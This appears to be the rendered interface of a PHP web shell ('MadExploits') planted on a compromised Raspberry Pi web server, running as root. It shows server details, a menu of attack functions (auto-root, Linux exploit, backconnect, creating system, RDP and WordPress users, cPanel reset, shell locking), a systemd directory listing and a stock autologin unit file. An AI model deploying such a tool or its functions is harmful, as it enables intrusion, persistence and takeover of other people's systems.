Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
systemd /
system /
[ HOME SHELL ]
Name
Size
Permission
Action
bluetooth.target.wants
[ DIR ]
drwxr-xr-x
getty.target.wants
[ DIR ]
drwxr-xr-x
getty@tty1.service.d
[ DIR ]
drwxr-xr-x
graphical.target.wants
[ DIR ]
drwxr-xr-x
halt.target.wants
[ DIR ]
drwxr-xr-x
multi-user.target.wants
[ DIR ]
drwxr-xr-x
network-online.target.wants
[ DIR ]
drwxr-xr-x
poweroff.target.wants
[ DIR ]
drwxr-xr-x
printer.target.wants
[ DIR ]
drwxr-xr-x
rc-local.service.d
[ DIR ]
drwxr-xr-x
reboot.target.wants
[ DIR ]
drwxr-xr-x
remote-fs.target.wants
[ DIR ]
drwxr-xr-x
sockets.target.wants
[ DIR ]
drwxr-xr-x
sysinit.target.wants
[ DIR ]
drwxr-xr-x
timers.target.wants
[ DIR ]
drwxr-xr-x
autologin@.service
1.51
KB
-rw-r--r--
dbus-fi.w1.wpa_supplicant1.ser...
286
B
-rw-r--r--
dbus-org.bluez.service
420
B
-rw-r--r--
dbus-org.freedesktop.Avahi.ser...
1.02
KB
-rw-r--r--
dbus-org.freedesktop.timesync1...
1.4
KB
-rw-r--r--
default.target
598
B
-rw-r--r--
dhcpcd5.service
260
B
-rw-r--r--
display-manager.service
689
B
-rw-r--r--
node_exporter.service
210
B
-rw-r--r--
sshd.service
538
B
-rw-r--r--
syslog.service
435
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : autologin@.service
# This file is part of systemd. # # systemd is free software; you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 2.1 of the License, or # (at your option) any later version. [Unit] Description=Getty on %I Documentation=man:agetty(8) man:systemd-getty-generator(8) Documentation=http://0pointer.de/blog/projects/serial-console.html After=systemd-user-sessions.service plymouth-quit-wait.service After=rc-local.service # If additional gettys are spawned during boot then we should make # sure that this is synchronized before getty.target, even though # getty.target didn't actually pull it in. Before=getty.target IgnoreOnIsolate=yes # On systems without virtual consoles, don't start any getty. Note # that serial gettys are covered by serial-getty@.service, not this # unit. ConditionPathExists=/dev/tty0 [Service] # the VT is cleared by TTYVTDisallocate ExecStart=-/sbin/agetty --autologin pi --noclear %I $TERM Type=idle Restart=always RestartSec=0 UtmpIdentifier=%I TTYPath=/dev/%I TTYReset=yes TTYVHangup=yes TTYVTDisallocate=yes KillMode=process IgnoreSIGPIPE=no SendSIGHUP=yes # Unset locale for the console getty since the console has problems # displaying some internationalized messages. Environment=LANG= LANGUAGE= LC_CTYPE= LC_NUMERIC= LC_TIME= LC_COLLATE= LC_MONETARY= LC_MESSAGES= LC_PAPER= LC_NAME= LC_ADDRESS= LC_TELEPHONE= LC_MEASUREMENT= LC_IDENTIFICATION= [Install] WantedBy=getty.target DefaultInstance=tty1
Close